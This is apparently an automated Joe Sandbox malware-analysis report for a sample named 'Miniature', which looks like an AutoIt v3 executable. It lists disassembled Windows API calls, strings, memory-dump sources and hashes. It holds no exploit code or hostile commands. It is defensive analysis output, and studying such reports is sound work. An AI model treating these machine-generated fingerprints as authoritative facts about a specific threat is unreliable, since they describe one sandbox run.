                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00C9347A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C9348E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C9349F
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00C934D4
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C934DF
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C934EA
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C934F4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                            • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                            • Opcode ID: 7ae114c45c34c7d576d4259b852df2d1583634a0e5648d2183e8c680324b3ad1
                                                                                                                                                                                                                                                                                            • Instruction ID: a2a282fe8d42c8e3ac9a2b00c492e31fa082019c41c59482c7a213bad68a5ac7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ae114c45c34c7d576d4259b852df2d1583634a0e5648d2183e8c680324b3ad1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BB15F71A40205AFEB14DFA8DC89FAF7BB9EB09714F004115FA16EB2A1D774AD40DB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C85532
                                                                                                                                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,00CADC30,?,\\.\,00CADCD0), ref: 00C8560F
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00CADC30,?,\\.\,00CADCD0), ref: 00C8577B
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                            • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                            • Opcode ID: b8c90877b3f879b91939f0273a0ead3204cd62a7b03578762dd8398d20ed5d62
                                                                                                                                                                                                                                                                                            • Instruction ID: d09ce5fc3372c65ae43edf1f6992a400eba7be945e00f5828c019f5bb6b89f9c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8c90877b3f879b91939f0273a0ead3204cd62a7b03578762dd8398d20ed5d62
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B610630608905DFC724FF24C9919BDB3B2EF05358BA48166F416AB391E7B1DE81EB45
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00CA1BC4
                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00CA1BD9
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00CA1BE0
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA1C35
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00CA1C55
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CA1C89
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CA1CA7
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CA1CB9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,?), ref: 00CA1CCE
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00CA1CE1
                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(00000000), ref: 00CA1D3D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00CA1D58
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00CA1D6C
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00CA1D84
                                                                                                                                                                                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00CA1DAA
                                                                                                                                                                                                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00CA1DC4
                                                                                                                                                                                                                                                                                            • CopyRect.USER32(?,?), ref: 00CA1DDB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000412,00000000), ref: 00CA1E46
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                            • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                            • Opcode ID: 66df3c4c23ffd35dd336729bdf944269d5a975dbac73aa5ae73e0edbe9a90456
                                                                                                                                                                                                                                                                                            • Instruction ID: 6c1acfb6e30a2a73f3bd4e29020dc4d77f0e7913b91bd2fdb87f72758d13ba01
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66df3c4c23ffd35dd336729bdf944269d5a975dbac73aa5ae73e0edbe9a90456
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BB17C71604302AFD714DF64C884B9EBBE5FF86318F048918F99A9B2A1C731D945DB92
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00CA0D81
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA0DBB
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA0E25
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA0E8D
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA0F11
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CA0F61
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00CA0FA0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2FD52: _wcslen.LIBCMT ref: 00C2FD5D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C72BA5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C72BD7
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                            • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                            • Opcode ID: 9827c880b7943da663f8f032f6bf8390abf9cabed502361225abcc8efbbfd5bf
                                                                                                                                                                                                                                                                                            • Instruction ID: 3caba12ab6e0d7c182de6a110ff7d9ef81fef12406494ee456af556f6bf4c1dd
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9827c880b7943da663f8f032f6bf8390abf9cabed502361225abcc8efbbfd5bf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38E1F5312083428FC714DF24C99196AB3E2FF86358F14496DF8A69B3A1DB30EE45EB51
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C125F8
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00C12600
                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C1262B
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00C12633
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00C12658
                                                                                                                                                                                                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C12675
                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C12685
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C126B8
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C126CC
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00C126EA
                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C12706
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C12711
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C119CD: GetCursorPos.USER32(?), ref: 00C119E1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C119CD: ScreenToClient.USER32(00000000,?), ref: 00C119FE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C119CD: GetAsyncKeyState.USER32(00000001), ref: 00C11A23
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C119CD: GetAsyncKeyState.USER32(00000002), ref: 00C11A3D
                                                                                                                                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,00C1199C), ref: 00C12738
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                            • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                                            • Opcode ID: dc8c6066ba968fd26979abbce7814d9e3836f15adf9d3f1d98ad20ca509d6b66
                                                                                                                                                                                                                                                                                            • Instruction ID: d3dd73e914d46d3e6c89efd1d70f3411fd0e1527dc9e34ab99dc1cb8d8078f36
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc8c6066ba968fd26979abbce7814d9e3836f15adf9d3f1d98ad20ca509d6b66
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DB1BB75A002499FCB14DFA8CC85BEE7BB5FB49315F004229FA16AB2D0DB70E980DB54
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C71A60
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A6C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A7B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A82
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C71A99
                                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C71741
                                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C71775
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C7178C
                                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00C717C6
                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C717E2
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C717F9
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C71801
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C71808
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C71829
                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00C71830
                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C7185F
                                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C71881
                                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C71893
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C718BA
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C718C1
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C718CA
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C718D1
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C718DA
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C718E1
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C718ED
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C718F4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71ADF: GetProcessHeap.KERNEL32(00000008,00C714FD,?,00000000,?,00C714FD,?), ref: 00C71AED
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C714FD,?), ref: 00C71AF4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C714FD,?), ref: 00C71B03
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2a670156ea26b30dc142f8192de12e03b9de93f22a3b957be73c3a6454f15552
                                                                                                                                                                                                                                                                                            • Instruction ID: 56d5f6cd9c29fba19dc5dcb3fdb3c1becd6be37ed8bdba9a33582769dd916d4d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a670156ea26b30dc142f8192de12e03b9de93f22a3b957be73c3a6454f15552
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B57149B2D00209ABDF109FA9DC45FEEBBB8BF05314F198125F92AA7190D7319A05CB61
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C9CF1D
                                                                                                                                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00CADCD0,00000000,?,00000000,?,?), ref: 00C9CFA4
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C9D004
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9D054
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C9D0CF
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C9D112
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C9D221
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C9D2AD
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00C9D2E1
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C9D2EE
                                                                                                                                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C9D3C0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                            • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                                            • Opcode ID: 3fb2e296ee5ef5ed20baf28ec86bec709ad916926d420c6f3a5f1533224f5924
                                                                                                                                                                                                                                                                                            • Instruction ID: 09e22f161615df5c4e83b27d5ad63f0d4904d57b11ecb2cf9b5eafa9b9483d6d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fb2e296ee5ef5ed20baf28ec86bec709ad916926d420c6f3a5f1533224f5924
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 401268356046019FCB14DF14C885B6ABBE5FF89714F04889DF89A9B3A2CB31ED45EB81
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00CA1462
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA149D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CA14F0
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA1526
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA15A2
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA161D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2FD52: _wcslen.LIBCMT ref: 00C2FD5D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C73535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C73547
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                                            • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                                            • Opcode ID: 855fea810e9bf4ff185f00458a60d5c572daac20fb91a8285c68c279a3601caf
                                                                                                                                                                                                                                                                                            • Instruction ID: c5a84db064d336f1360eaebf91035e381963ca70ac3a8f6f58d5403be381c150
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 855fea810e9bf4ff185f00458a60d5c572daac20fb91a8285c68c279a3601caf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFE1C3756083128FC704DF25C45096AB7E2FF96318F18895DF8A69B3A1DB30EE45DB81
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                                            • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                                            • Opcode ID: ba5f660bf1405119f08e1f354431ba490b0d14a7240fc862b898b903a7904d84
                                                                                                                                                                                                                                                                                            • Instruction ID: ae0853080370afe4b014809a7d1a6a9d37aea004f250f488efce91f9e43496cc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba5f660bf1405119f08e1f354431ba490b0d14a7240fc862b898b903a7904d84
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 017107B260012A8BCF109F7CC9456FF33A1AB61754F220529F877BB294EA35DE45D790
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA8DB5
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA8DC9
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA8DEC
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA8E0F
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CA8E4D
                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00CA6691), ref: 00CA8EA9
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CA8EE2
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CA8F25
                                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CA8F5C
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00CA8F68
                                                                                                                                                                                                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CA8F78
                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?,00CA6691), ref: 00CA8F87
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CA8FA4
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CA8FB0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
